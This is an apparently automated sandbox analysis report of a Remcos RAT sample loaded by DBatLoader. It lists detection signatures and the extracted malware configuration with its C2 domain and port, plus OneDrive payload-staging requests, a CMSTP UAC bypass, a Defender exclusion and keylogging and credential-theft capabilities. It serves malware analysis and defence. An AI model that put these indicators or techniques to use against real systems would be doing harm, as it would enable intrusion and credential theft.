Windows Analysis Report
midyear_statement.exe

Overview

General Information

Sample name:	midyear_statement.exe
Analysis ID:	1417015
MD5:	dd8e3f6ac5c24960b3a69490082c60e1
SHA1:	c5f8aaec5baa571791789dd5fac53e27938dbc29
SHA256:	15db18392d7bbf15b30e528db05ec306e00ac3227277d0639064ec3e2bc98c73
Tags:	exe
Infos:

Detection

Remcos, DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Sigma detected: TrustedPath UAC Bypass Pattern

Snort IDS alert for network traffic

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Installs a global keyboard hook

Maps a DLL or memory area into another process

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Program Location with Network Connections

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing

Found malware configuration

Source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "xwww.zuckdgreb.duckdns.org:4445:0", "Assigned name": "vista", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-W5UGP5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Dhuirrkw.PIF	ReversingLabs: Detection: 26%
Source: C:\Windows \System32\netutils.dll	ReversingLabs: Detection: 75%

Multi AV Scanner detection for submitted file

Source: midyear_statement.exe	ReversingLabs: Detection: 26%
Source: midyear_statement.exe	Virustotal: Detection: 31%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12363837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		24_2_12363837
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,		27_2_00404423

Source: wkrriuhD.pif

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_123374FD _wcslen,CoGetObject,

24_2_123374FD

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Unpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack

Uses 32bit PE files

Source: midyear_statement.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
Source:	Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_040A5878
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	24_2_00401612
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	24_2_0040128D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339253
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	24_2_1234C291
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	24_2_1233C34D
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_12339665
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_12349AF5
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233783C FindFirstFileW,FindNextFileW,	24_2_1233783C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	24_2_1233880C
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1237E879 FindFirstFileExA,	24_2_1237E879
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_1233BD37
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	24_2_146410F1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_14646580 FindFirstFileExA,	24_2_14646580
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,	27_2_0040AE51
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	28_2_00407EF8

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

24_2_12337C97

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49708 -> 192.3.109.132:4445
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 192.3.109.132:4445 -> 192.168.2.7:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xwww.zuckdgreb.duckdns.org

Uses dynamic DNS services

Source: unknown

DNS query: name: www.zuckdgreb.duckdns.org

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\midyear_statement.exe

Code function: 0_2_040BD1D0 InternetCheckConnectionA,

0_2_040BD1D0

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

24_2_1234B380

Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wkrriuhD.pif, 0000001B.00000003.1405784796.0000000000AA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
